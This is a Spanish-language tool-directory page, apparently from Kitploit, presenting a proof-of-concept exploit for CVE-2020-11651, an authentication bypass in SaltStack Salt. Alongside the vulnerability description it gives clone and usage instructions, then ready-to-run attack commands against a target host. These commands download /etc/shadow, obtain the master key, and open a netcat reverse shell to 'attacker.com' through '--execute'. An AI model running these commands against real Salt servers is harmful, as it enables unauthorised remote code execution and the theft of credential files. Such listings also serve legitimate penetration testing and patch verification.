Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-11651 — CVE-2020-11651: Prueba de concepto | Kitploit
Herramientas/GitHubGitHub/0xc0d/cve-2020-11651
Análisis de VulnerabilidadesExplotaciónExfiltración de DatosPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHub0xc0d/cve-2020-11651

CVE-2020-11651

CVE-2020-11651: Prueba de concepto

Ver Repositorio
40142hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-11651

Se descubrió un problema en SaltStack Salt anterior a 2019.2.4 y 3000 anterior a 3000.2. La clase ClearFuncs del proceso salt-master no valida correctamente las llamadas a métodos. Esto permite que un usuario remoto acceda a algunos métodos sin autenticación. Estos métodos pueden ser utilizados para recuperar tokens de usuario del salt master y/o ejecutar comandos arbitrarios en salt minions.

Detalles

Parches para versiones de salt no soportadas

Instalación

root@kitploit:~
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

Uso

root@kitploit:~
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        Comando a ejecutar. Por defecto: /bin/sh (usa netcat para reverse shell)
  --upload src dest, -u src dest
                        Subir un archivo
  --download src dest, -d src dest
                        Descargar un archivo
  --minions             Enviar comando a todos los minions en el master
  --quiet, -q           Habilitar modo silencioso
  --fetch-key-only      Solo obtener la clave
Descargar herramienta

Ejemplo

Descargar archivo shadow

root@kitploit:~
./PoC.py --host target.com --download /etc/shadow ./shadow

Ejecutar una reverse shell

root@kitploit:~
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""

Obtener la clave

root@kitploit:~
./PoC.py --host target.com --fetch-key-only